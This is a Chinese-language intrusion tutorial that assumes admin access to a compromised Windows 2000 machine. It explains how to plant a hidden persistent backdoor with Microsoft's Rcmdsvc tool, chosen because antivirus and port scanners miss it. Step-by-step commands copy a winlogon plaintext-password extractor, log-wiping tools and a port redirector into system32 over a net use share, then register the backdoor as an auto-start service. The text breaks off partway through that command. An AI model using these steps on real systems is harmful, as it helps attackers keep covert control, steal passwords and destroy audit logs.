| |
在阅读本文之前,假设你已经成功入侵了某台Windows2000主机并取得了管理员帐号。大多数时候我们入侵某台主机的目的并不是为了直接破坏,可以在该主机上留下后门以便自己以后可以方便的“使用”该机。
目前一般情况下,入侵Windows2000后使用最多的后门是RemoteNc了,但该工具有一很大的缺点,容易被杀毒软件查出,而且如果用Fport或Active Ports等软件也可以看到它监听的端口,这很容易让管理员发现。
对于Windows2000下的后门推荐使用Windows2000 Resoruce Kit中自带的一个小工具Rcmdsvc.exe和Rcmd.exe,这是微软自己出的一个用来在命令行下远程管理主机的小工具。它有以下优点:
1、不会被杀毒软件认为是病毒或后门程序,毕竟这是微软自己出的东西。
2、非常隐蔽,它开的端口是445,和Windows2000系统的Microsoft-DS服务开的端口一样,用Fport或Active Ports都不能列出它正在监听的端口。
下面我们来看一次实际的操作,当然进行以下操作之前假设已经具有以下条件:
1、你已经取得了xxx.xxx.xxx.xxx的管理员权限;
2、该机启用了Tcp/Ip上的Netbios支持;
3、在IP安全策略中对139和445端口未进行屏蔽;
4、安全策略中对匿名连接的额外限制采用的是默认的安全选项。
如果后三条中有某条不能满足,那么会让我们的后续操作有些困难,不过仍然有其它办法可以继续,如果大家感兴趣我会在以后的文章中说明。
c:\>net use z: \\xxx.xxx.xxx.xxx "password" /user:"administrator"
c:\>copy rcmdsvc.exe z:\winnt\system32
c:\>copy pulist.exe z:\winnt\system32
c:\>copy findpass.exe z:\winnt\system32
c:\>copy kill.exe z:\winnt\system32
c:\>copy clearel.exe z:\winnt\system32
c:\>copy clealog.cmd z:\winnt\system32
c:\>copy fpipe.exe z:\winnt\system32
c:\>copy msvcp60.dll z:\winnt\system32
拷贝一些常用的工具到对方服务器上,在这里对这些工具做一个简要说明:
Rcmdsvc.exe Windows2000 Resource Kit中的远程命令行服务器端程序;
Pulist.exe 可以列出系统进程和该进程所属用户的工具;
Findpass.exe 可以在winlogon.exe进程中查找指定用户名的名文口令的工具;
Kill.exe 可以用pdi或进程名杀掉指定进程的工具;
Clearel.exe 清除系统、应用程序、安全日志的工具;
Clealog.cmd 同上;
Fpipe.exe 可以在命令行下做端口重定向的工具;
Msvcp60.dll vc的运行库,这个东西其实不是必须的,但为了防止在某些缺少Msvcp60.dll的机上在运行Clealog清除日志时对方的机上会突然弹出一个对话框说缺少Msvcp60.dll的尴尬情况,最好把它一起复制过去。
c:\>sc \\xxx.xxx.xxx.xxx create "Remote Command Service" binpath=
c:\winnt\system32\rcmdsvc.exe type= own start= auto |
|
